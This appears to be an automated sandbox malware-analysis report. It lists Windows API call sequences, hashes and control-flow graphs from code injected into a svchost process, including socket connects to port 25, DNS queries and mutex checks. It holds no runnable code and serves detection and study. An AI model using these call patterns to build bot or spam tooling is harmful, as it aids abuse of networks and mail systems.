                                                                                                                                                                                • setsockopt.WS2_32(?,0000FFFF,00001006,?,00000008), ref: 13151333
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$Leave$Entersetsockopt
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2622634160-0
                                                                                                                                                                                • Opcode ID: a6407b1cd4d2954f65e7e183993cd6715576cc1c471be36c2dc44acfaac3818c
                                                                                                                                                                                • Instruction ID: eeaae9abf41def517d93f69b57e648ada73d6bba23f07fd8ba6a5e794752873d
                                                                                                                                                                                • Opcode Fuzzy Hash: a6407b1cd4d2954f65e7e183993cd6715576cc1c471be36c2dc44acfaac3818c
                                                                                                                                                                                • Instruction Fuzzy Hash: 2D3116B5A047419FC720DF5AC98194AFBF4FB09324B908A3EE5AAD7A90C770A544CF10
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • htons.WS2_32(00000019), ref: 1314BD2F
                                                                                                                                                                                • setsockopt.WS2_32(1314CF5F,0000FFFF,00001005,?,00000004), ref: 1314BD78
                                                                                                                                                                                • setsockopt.WS2_32(1314CF5F,0000FFFF,00001006,?,00000004), ref: 1314BD8B
                                                                                                                                                                                • connect.WS2_32(1314CF5F,00000002,00000010), ref: 1314BD98
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: setsockopt$connecthtons
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3400676187-0
                                                                                                                                                                                • Opcode ID: edb9acae06f361222555068b2b358c9c1b74db9419235bff203ff353452a2ee5
                                                                                                                                                                                • Instruction ID: bfc2101d7bc6df8bcd8ecf80e76a602450dde5e84ff1f9cab78317e6ca9cf96a
                                                                                                                                                                                • Opcode Fuzzy Hash: edb9acae06f361222555068b2b358c9c1b74db9419235bff203ff353452a2ee5
                                                                                                                                                                                • Instruction Fuzzy Hash: 74016979A40309BBEB11DBA8CC06EEFB7B9AF85700F100439F644AB190D7B0AA049B51
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?), ref: 1314737F
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 13147392
                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 131473BF
                                                                                                                                                                                • wsprintfA.USER32 ref: 131473E8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Time$CountFileInformationSystemTickZonewsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3771035241-0
                                                                                                                                                                                • Opcode ID: 0addc934ec445994fa1af9f440de5eea302fbc9d82595a5cc2f4b90946519963
                                                                                                                                                                                • Instruction ID: 22f063ee8376c6af03fe04f9f38c1742ffbcef6b8c4240f2c466d1715124cb51
                                                                                                                                                                                • Opcode Fuzzy Hash: 0addc934ec445994fa1af9f440de5eea302fbc9d82595a5cc2f4b90946519963
                                                                                                                                                                                • Instruction Fuzzy Hash: 8C0196B29002199FEF08EFF4CC85DD93BADEB04258F114022FA15D2154DB75D5848FA0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 13152BFD: __amsg_exit.LIBCMT ref: 13152C0B
                                                                                                                                                                                • __amsg_exit.LIBCMT ref: 1315433B
                                                                                                                                                                                • __lock.LIBCMT ref: 1315434B
                                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 13154368
                                                                                                                                                                                • InterlockedIncrement.KERNEL32(1315AD08), ref: 13154393
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__lock
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4129207761-0
                                                                                                                                                                                • Opcode ID: e12d1765d70a06c6ffa649bac0df2439d2bc161c8bb70098c611c4f1f0def508
                                                                                                                                                                                • Instruction ID: 841d950e54b799b83921e5adb6aed1b0e70aea622248ec8fdb6f22e4af3ebf93
                                                                                                                                                                                • Opcode Fuzzy Hash: e12d1765d70a06c6ffa649bac0df2439d2bc161c8bb70098c611c4f1f0def508
                                                                                                                                                                                • Instruction Fuzzy Hash: F0018E36F81731DBDB95AF6A95887897760BF03611F484115F430B7690DB386442CBD1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32(00000001,00000000,13152F07,13152DA8,00000001,1315295F,?,00000000,00000000,?,?,?,13152A71,?,13152F22,?), ref: 13152B88
                                                                                                                                                                                  • Part of subcall function 13152A95: TlsGetValue.KERNEL32(00000000,13152B9B,?,?,?,13152A71,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486), ref: 13152A9C
                                                                                                                                                                                  • Part of subcall function 13152A95: TlsSetValue.KERNEL32(00000000,?,?,13152A71,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?), ref: 13152ABD
                                                                                                                                                                                • __calloc_crt.LIBCMT ref: 13152BAA
                                                                                                                                                                                  • Part of subcall function 13152F55: __calloc_impl.LIBCMT ref: 13152F63
                                                                                                                                                                                  • Part of subcall function 13152F55: Sleep.KERNEL32(00000000), ref: 13152F7A
                                                                                                                                                                                  • Part of subcall function 13152A27: TlsGetValue.KERNEL32(00000000,13153CE0,1315291D,?,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?), ref: 13152A34
                                                                                                                                                                                  • Part of subcall function 13152A27: TlsGetValue.KERNEL32(FFFFFFFF,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?,?,?,131520D2,0000000E), ref: 13152A4B
                                                                                                                                                                                  • Part of subcall function 13152AC7: GetModuleHandleA.KERNEL32(KERNEL32.DLL,131569D8,0000000C,13152BD8,00000000,00000000,?,?,?,13152A71,?,13152F22,?,00000001,?,131523F7), ref: 13152AD8
                                                                                                                                                                                  • Part of subcall function 13152AC7: GetProcAddress.KERNEL32(?,EncodePointer), ref: 13152B0C
                                                                                                                                                                                  • Part of subcall function 13152AC7: GetProcAddress.KERNEL32(?,DecodePointer), ref: 13152B1C
                                                                                                                                                                                  • Part of subcall function 13152AC7: InterlockedIncrement.KERNEL32(1315AD08), ref: 13152B3E
                                                                                                                                                                                  • Part of subcall function 13152AC7: __lock.LIBCMT ref: 13152B46
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 13152BDA
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,?,13152A71,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?), ref: 13152BF2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread__calloc_crt__calloc_impl__lock
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2539975944-0
                                                                                                                                                                                • Opcode ID: adb725a9134938a95b1c836ee6b1e9ea189e50f410bd80173755e6f9bbf1f5cb
                                                                                                                                                                                • Instruction ID: 34a35ee0a2ee0b0f73b2b1eed6102eacb8e391b11be9a5fa08b7e9cf7a66c14b
                                                                                                                                                                                • Opcode Fuzzy Hash: adb725a9134938a95b1c836ee6b1e9ea189e50f410bd80173755e6f9bbf1f5cb
                                                                                                                                                                                • Instruction Fuzzy Hash: 82F0C237605772ABD73A2B79AC45ECA3BA49F076B1B15452AF834E70C0CF25D4438AB0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • __lock.LIBCMT ref: 131524BC
                                                                                                                                                                                  • Part of subcall function 1315246D: __mtinitlocknum.LIBCMT ref: 13152481
                                                                                                                                                                                  • Part of subcall function 1315246D: __amsg_exit.LIBCMT ref: 1315248D
                                                                                                                                                                                  • Part of subcall function 1315246D: EnterCriticalSection.KERNEL32(?,?,?,131520D2,0000000E,13156938,0000000C,13151FA7), ref: 13152495
                                                                                                                                                                                • ___sbh_find_block.LIBCMT ref: 131524C7
                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,13156998,0000000C,13152BEE,00000000,?,?,?,13152A71,?,13152F22,?,00000001,?,131523F7), ref: 13152506
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,13152A71,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?), ref: 13152517
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 568605419-0
                                                                                                                                                                                • Opcode ID: f58e1755293160f1002cdce4609a87691e82f113ad09d145b0cf43435aaf03ee
                                                                                                                                                                                • Instruction ID: a14f81d0e6afd0b26f5cca17c86cd6e71ecad54a2d1094fc1621cce35ebd326f
                                                                                                                                                                                • Opcode Fuzzy Hash: f58e1755293160f1002cdce4609a87691e82f113ad09d145b0cf43435aaf03ee
                                                                                                                                                                                • Instruction Fuzzy Hash: 4301DB77A01316EBDB255FB59918BCD37A8EF03366F148428F430A71C0CF34A142DA54
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?), ref: 131472FB
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314730E
                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 1314733B
                                                                                                                                                                                • wsprintfA.USER32 ref: 1314735E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Time$CountFileInformationSystemTickZonewsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3771035241-0
                                                                                                                                                                                • Opcode ID: 9b8cba2e2565f2633aaa26bbdea80ebef9a999678d94bc7ba9552831924f8386
                                                                                                                                                                                • Instruction ID: bd6bd433622d16bfb8a7ed934dcb1d9e70c68623f8fc179dd0aa0ea7f68c250e
                                                                                                                                                                                • Opcode Fuzzy Hash: 9b8cba2e2565f2633aaa26bbdea80ebef9a999678d94bc7ba9552831924f8386
                                                                                                                                                                                • Instruction Fuzzy Hash: EA0162B2900229AFEF08EFF4CC85EDA3B6DEB04258F014022F915E3154DB74D9848FA0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,?,00000000), ref: 131478E7
                                                                                                                                                                                • lstrlenA.KERNEL32(?,00000079,00000078,00000077,00000076,00000072,00000073,00000075,00000074,00000000,?,?,00000000), ref: 131479A1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1659193697-0
                                                                                                                                                                                • Opcode ID: 2c14ef2d4ae874a7a58cd04810082f978d56a26be6aa824f51d98c3629217dfc
                                                                                                                                                                                • Instruction ID: 3e9b2355841d95ef22162ce4f4d8e982ddce70f17a4da1c5c4dcb4839e4577d4
                                                                                                                                                                                • Opcode Fuzzy Hash: 2c14ef2d4ae874a7a58cd04810082f978d56a26be6aa824f51d98c3629217dfc
                                                                                                                                                                                • Instruction Fuzzy Hash: FB81E076A0438A9FDB21CF78CC90BEE3BA5AF51304F3C4069E8658B242E775D546CB61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • StrStrA.SHLWAPI(?,131414AC,?,-00000004,-00000008,?,?,13145A2C,-00000004,?,?,?,?,00000000,76B7EA30), ref: 13150AD3
                                                                                                                                                                                • StrStrA.SHLWAPI(?,131414A8,?,-00000004,-00000008,?,?,13145A2C,-00000004,?,?,?,?,00000000,76B7EA30), ref: 13150AEC
                                                                                                                                                                                • CharUpperBuffA.USER32(?,00000001,?,-00000004,-00000008,?,?,13145A2C,-00000004,?,?,?,?,00000000,76B7EA30), ref: 13150AFC
                                                                                                                                                                                • CharUpperBuffA.USER32(00000001,00000001,?,-00000004,-00000008,?,?,13145A2C,-00000004,?,?,?,?,00000000,76B7EA30), ref: 13150B06
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: BuffCharUpper
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3964851224-0
                                                                                                                                                                                • Opcode ID: 958c5ad26a8dfa64cf959f5ad1f9786dc7f05fd98d7ff308719baaa4a5385bca
                                                                                                                                                                                • Instruction ID: 33661ecf4e8e57439f419d647e127ea0354b88d928e222e2be8bc089649f8951
                                                                                                                                                                                • Opcode Fuzzy Hash: 958c5ad26a8dfa64cf959f5ad1f9786dc7f05fd98d7ff308719baaa4a5385bca
                                                                                                                                                                                • Instruction Fuzzy Hash: 075139B5A40249EFD711DFACC980DAABBF9FF59308B644469F894E7201D731AA50CB90
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(05801028,13161EF0,00000000,05801020,05801020,?,1314CD65,?,13161EF0,131616E8), ref: 131518EE
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(05801028,?,1314CD65,?), ref: 131518FB
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(05801028,131616E8,?,1314CD65,?), ref: 1315190E
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000000,131616E8,?,1314CD65,?), ref: 13151927
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2978645861-0
                                                                                                                                                                                • Opcode ID: caab4dd3995b537a3e7fe88bb2e5526481f7b060322a23dbf6b07f2b764f47e7
                                                                                                                                                                                • Instruction ID: 079bf1789869fdfda7f0d76e75eebd716d75c14f98fc5ce676a7518e497409ae
                                                                                                                                                                                • Opcode Fuzzy Hash: caab4dd3995b537a3e7fe88bb2e5526481f7b060322a23dbf6b07f2b764f47e7
                                                                                                                                                                                • Instruction Fuzzy Hash: 7221AC75200205EFC709CF55C48495AB7BAFF8A324B25807DE5679B311C730F981CBA0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,?,00000000,1314B99F,?,00000000,-00000004,0000003B,?,00000000,00000000,00000000,?,1468EC68,00000000), ref: 1315153A
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,1468EC68,00000000,?,?,?,?,?,?,?), ref: 13151548
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,131616E8,?,1468EC68,00000000,?,?,?,?,?,?,?), ref: 1315155D
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,000003E8,0000000C), ref: 13151597
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.709426233.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2978645861-0
                                                                                                                                                                                • Opcode ID: 52f5398c6f4f577c8c4e76fa03d76cbf28ba0f649fac66cf99410e3d807f1ade
                                                                                                                                                                                • Instruction ID: a61f007b530fa145b951fee3529638bfdb7bb09819d3071aa21f2857e0bba9e4
                                                                                                                                                                                • Opcode Fuzzy Hash: 52f5398c6f4f577c8c4e76fa03d76cbf28ba0f649fac66cf99410e3d807f1ade
                                                                                                                                                                                • Instruction Fuzzy Hash: 23016D756143519FCB32DF6ACDC4806B7E9AB4A2617050C39F557D3211C730E844CB61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 0 1314e022-1314e084 GetSystemTime call 1314ffe0 GetTickCount * 2 3 1314e086 0->3 4 1314e08d-1314e090 0->4 3->4 5 1314e092-1314e0ca call 13144eb1 * 2 call 13145b8d call 13144ec3 * 2 4->5 6 1314e0cd-1314e0d3 4->6 5->6 8 1314e19c-1314e1ad call 1314daf3 6->8 9 1314e0d9-1314e0e0 6->9 18 1314e2a7-1314e2cb #22 #3 call 13142f89 8->18 19 1314e1b3-1314e1c7 OpenMutexA 8->19 10 1314e0f5-1314e107 #23 9->10 11 1314e0e2-1314e0f0 #22 #3 9->11 15 1314e10d-1314e142 call 13142f89 call 131506de 10->15 16 1314e32e-1314e35b ExitProcess GetTickCount 10->16 11->10 41 1314e144 15->41 42 1314e14b-1314e16a #9 #4 15->42 28 1314e362-1314e390 call 13144d1b #9 16->28 32 1314e2d0-1314e2e1 call 131506de 18->32 23 1314e1d7-1314e1f8 call 13144c2f GetTickCount call 1314dfa8 19->23 24 1314e1c9-1314e1d1 CreateMutexA 19->24 23->4 53 1314e1fe-1314e21a call 13142f89 call 131506de 23->53 24->23 39 1314e393-1314e399 28->39 32->4 51 1314e2e7-1314e329 call 13144c2f call 13144eb1 * 2 call 1314df63 call 13144ec3 * 2 32->51 45 1314e3f9 39->45 46 1314e39b-1314e3c5 call 13142f89 DnsQuery_A 39->46 41->42 48 1314e16c-1314e172 call 1314d187 42->48 49 1314e179-1314e184 GetLastError Sleep 42->49 54 1314e3fb-1314e401 45->54 68 1314e3c7-1314e3eb call 13144d1b DnsRecordListFree 46->68 69 1314e3f0-1314e3f7 46->69 64 1314e177 48->64 56 1314e18a-1314e196 49->56 51->4 88 1314e21c-1314e228 #3 53->88 89 1314e22d-1314e259 call 13142f89 call 131506de GetTickCount 53->89 62 1314e472-1314e47f 54->62 63 1314e403-1314e409 54->63 56->4 56->8 65 1314e481-1314e488 62->65 66 1314e49a-1314e4ba call 13142f89 call 131506de 62->66 71 1314e467-1314e470 63->71 72 1314e40b-1314e44f #23 #21 #4 63->72 64->56 73 1314e489-1314e48b 65->73 66->28 95 1314e4c0-1314e4c6 66->95 68->69 69->39 69->45 71->54 71->62 78 1314e461-1314e462 #3 72->78 79 1314e451-1314e45c #16 72->79 80 1314e494-1314e498 73->80 81 1314e48d 73->81 78->71 79->78 80->66 80->73 81->80 88->89 89->4 102 1314e25f-1314e29a Sleep call 13142f89 call 131506de GetTickCount 89->102 95->28 98 1314e4cc-1314e4da Sleep 95->98 98->95 101 1314e4dc 98->101 101->28 109 1314e29c-1314e2a2 102->109 109->4
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetSystemTime.KERNEL32(?,00020000,76B5EEA0,00000000), ref: 1314E02F
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314E04A
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314E051
                                                                                                                                                                                • #22.WS2_32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1314E0E5
                                                                                                                                                                                • #3.WS2_32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1314E0F0
                                                                                                                                                                                • #23.WS2_32(00000002,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1314E0FA
                                                                                                                                                                                • #9.WS2_32(00000019,-00000004,00000041,00000000,00000002,00000001,00000000), ref: 1314E14E
                                                                                                                                                                                • #4.WS2_32(00000002,00000010,00000019,-00000004,00000041,00000000,00000002,00000001,00000000), ref: 1314E163
                                                                                                                                                                                • GetLastError.KERNEL32(00000002,00000010,00000019,-00000004,00000041,00000000,00000002,00000001,00000000), ref: 1314E179
                                                                                                                                                                                • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1314E184
                                                                                                                                                                                • OpenMutexA.KERNEL32(001F0001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1314E1BF
                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1314E1D1
                                                                                                                                                                                • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1314E1E8
                                                                                                                                                                                • #3.WS2_32(-00000004,00000049,00000000), ref: 1314E228
                                                                                                                                                                                • GetTickCount.KERNEL32(-00000004,0000004A,00000000,-00000004,00000049,00000000), ref: 1314E24F
                                                                                                                                                                                • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1314E264
                                                                                                                                                                                • GetTickCount.KERNEL32(-00000004,0000004A,00000000), ref: 1314E28C
                                                                                                                                                                                • #22.WS2_32(00000002,00000000), ref: 1314E2B5
                                                                                                                                                                                • #3.WS2_32(00000002,00000000), ref: 1314E2C0
                                                                                                                                                                                • ExitProcess.KERNEL32(00000000,00000002,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1314E32E
                                                                                                                                                                                • GetTickCount.KERNEL32(00000000,76B7EA30,00000000), ref: 1314E347
                                                                                                                                                                                • #9.WS2_32(00000019,?,?,00000000), ref: 1314E387
                                                                                                                                                                                • DnsQuery_A.DNSAPI(-00000004,00000001,00000000,00000000,?,00000000,?,00000019,?,?,?,?,?,00000000), ref: 1314E3BE
                                                                                                                                                                                • DnsRecordListFree.DNSAPI(?,?,00000000,?,00000019,?,?,?,?,?,00000000), ref: 1314E3EB
                                                                                                                                                                                • #23.WS2_32(00000002,00000001,00000006,-00000004,00000001,00000000,00000000,?,00000000,?,00000019), ref: 1314E411
                                                                                                                                                                                • #21.WS2_32(00000000,0000FFFF,00001006,?,00000008,00000002,00000001,00000006,-00000004,00000001,00000000,00000000,?,00000000,?,00000019), ref: 1314E433
                                                                                                                                                                                • #4.WS2_32(00000000,00000002,00000010,00000000,0000FFFF,00001006,?,00000008,00000002,00000001,00000006,-00000004,00000001,00000000,00000000,?), ref: 1314E448
                                                                                                                                                                                • #16.WS2_32(00000000,1468EA2E,00000064,00000000,00000000,00000002,00000010,00000000,0000FFFF,00001006,?,00000008,00000002,00000001,00000006,-00000004), ref: 1314E45C
                                                                                                                                                                                • #3.WS2_32(00000000,00000000,00000002,00000010,00000000,0000FFFF,00001006,?,00000008,00000002,00000001,00000006,-00000004,00000001,00000000,00000000), ref: 1314E462
                                                                                                                                                                                • Sleep.KERNEL32(000003E8,-00000004,00000048,00000000,00000019,?,?,00000000), ref: 1314E4D1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountTick$Sleep$Mutex$CreateErrorExitFreeLastListOpenProcessQuery_RecordSystemTime
                                                                                                                                                                                • String ID: 0u
                                                                                                                                                                                • API String ID: 2845953079-3203441087
                                                                                                                                                                                • Opcode ID: c8b64258001e370bbd683c5772ae33d7400adee99e8d36d9e8e4e8549de03ca8
                                                                                                                                                                                • Instruction ID: 43d5bb9465e87192af08d7f6881986c4e70353d981fa44b77742f62da2d52e8e
                                                                                                                                                                                • Opcode Fuzzy Hash: c8b64258001e370bbd683c5772ae33d7400adee99e8d36d9e8e4e8549de03ca8
                                                                                                                                                                                • Instruction Fuzzy Hash: 17C1BFB5904369BBDB12AFB8CCC5AAEB77DFB05708F240539E509B3150EB786940CB61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 110 13143ed5-13143ee4 111 13143ee6-13143ee8 110->111 112 13143eed-13143ef0 110->112 113 131441bd-131441c0 111->113 112->111 114 13143ef2-13143ef5 112->114 114->111 115 13143ef7-13143f02 IsBadReadPtr 114->115 115->111 116 13143f04-13143f68 call 13144ff9 * 2 call 13144d1b * 2 #9 * 2 115->116 125 13143f8d 116->125 126 13143f6a-13143f8b call 13144f21 Sleep 116->126 128 13143f90-13143fef call 13144f21 125->128 126->128 132 13143ff1-13143ff3 128->132 133 13143ff5 132->133 134 1314403a-1314408c call 13144d46 132->134 135 13143ff8-13143ffb 133->135 141 1314408f-131440de #23 #21 GetTickCount #20 134->141 137 13144007-13144009 135->137 138 13143ffd-13144005 135->138 137->134 140 1314400b-13144038 call 13144d46 137->140 138->135 138->137 140->132 143 13144155-13144167 call 13144c2f 141->143 144 131440e0-131440e9 GetTickCount 141->144 151 13144171-13144174 143->151 152 13144169-1314416c #3 143->152 147 131440eb-1314410d #17 144->147 149 13144111-13144113 147->149 150 1314410f 147->150 153 13144115-13144129 call 13144fae 149->153 154 1314412b-13144133 GetLastError 149->154 150->149 156 13144186-131441b2 call 13143972 call 13144c2f 151->156 157 13144176-13144184 call 13144c2f 151->157 152->151 153->147 154->143 155 13144135-1314414f #3 Sleep 154->155 155->141 155->143 164 131441b4-131441b6 156->164 168 131441b8-131441ba 156->168 157->164 166 131441bc 164->166 166->113 168->166
                                                                                                                                                                                APIs
                                                                                                                                                                                • IsBadReadPtr.KERNEL32(00000002,00000001,00000000,00000000), ref: 13143EFA
                                                                                                                                                                                • #9.WS2_32(00000035,?,?,?,?,?,?,?,?,?,?,?,0000007C), ref: 13143F44
                                                                                                                                                                                • #9.WS2_32(00000035,00000035,?,?,?,?,?,?,?,?,?,?,?,0000007C), ref: 13143F58
                                                                                                                                                                                • Sleep.KERNEL32(00000035,00000035,?,?,?,?,?,?,?,?,?,?,?,0000007C), ref: 13143F85
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ReadSleep
                                                                                                                                                                                • String ID:
